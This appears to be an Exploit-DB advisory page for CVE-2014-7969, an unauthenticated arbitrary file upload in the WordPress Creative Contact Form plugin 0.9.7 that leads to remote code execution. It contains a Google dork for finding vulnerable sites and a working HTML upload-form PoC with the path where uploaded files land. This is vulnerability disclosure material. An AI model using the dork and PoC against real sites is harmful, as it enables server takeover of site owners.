Lucene search
Gianni AngelozziEDB-ID:34922HistoryOct 08, 2014 - 12:00 a.m.
WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload
2014-10-0800:00:00
Gianni Angelozzi
www.exploit-db.com
35
==========================================================
"Creative Contact Form - The Best WordPress Contact Form Builder" -
Arbitrary File Upload
# Author: Gianni Angelozzi
# Date: 08/10/2014
# Remote: Yes
# Vendor Homepage: https://profiles.wordpress.org/creative-solutions-1/
# Software Link: https://wordpress.org/plugins/sexy-contact-form/
# CVE: CVE-2014-7969
# Version: all including latest 0.9.7
# Google Dork: inurl:"wp-content/plugins/sexy-contact-form"
This plugin includes a PHP script to accept file uploads that doesn't
perform any security check, thus allowing unauthenticated remote file
upload, leading to remote code execution. All versions are affected.
Uploaded files are stored with their original file name.
==========================================================
PoC
==========================================================
Trigger a file upload
<form method="POST" action="
http://TARGET/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Then the file is accessible under
http://TARGET/wp-content/plugins/sexy-contact-form/includes/fileupload/files/FILENAME
==========================================================
EOF
Thanks,
Gianni AngelozziRelated
nessus
nessus
Creative Contact Form Plugin for WordPress File Upload RCE
2014-11-24 00:00:00
Creative Contact Form Component for Joomla! File Upload RCE
2014-11-24 00:00:00
seebug
seebug
Creative Contact Form - Arbitrary File Upload
2014-11-13 00:00:00
cvelist
cvelist
CVE-2014-7969
2020-02-11 17:56:49
exploitpack
exploitpack
WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload
2014-10-08 00:00:00
prion
prion
Design/Logic Flaw
2020-02-11 18:15:00
nvd
nvd
CVE-2014-7969
2020-02-11 18:15:16
cve
cve
CVE-2014-7969
2020-02-11 18:15:16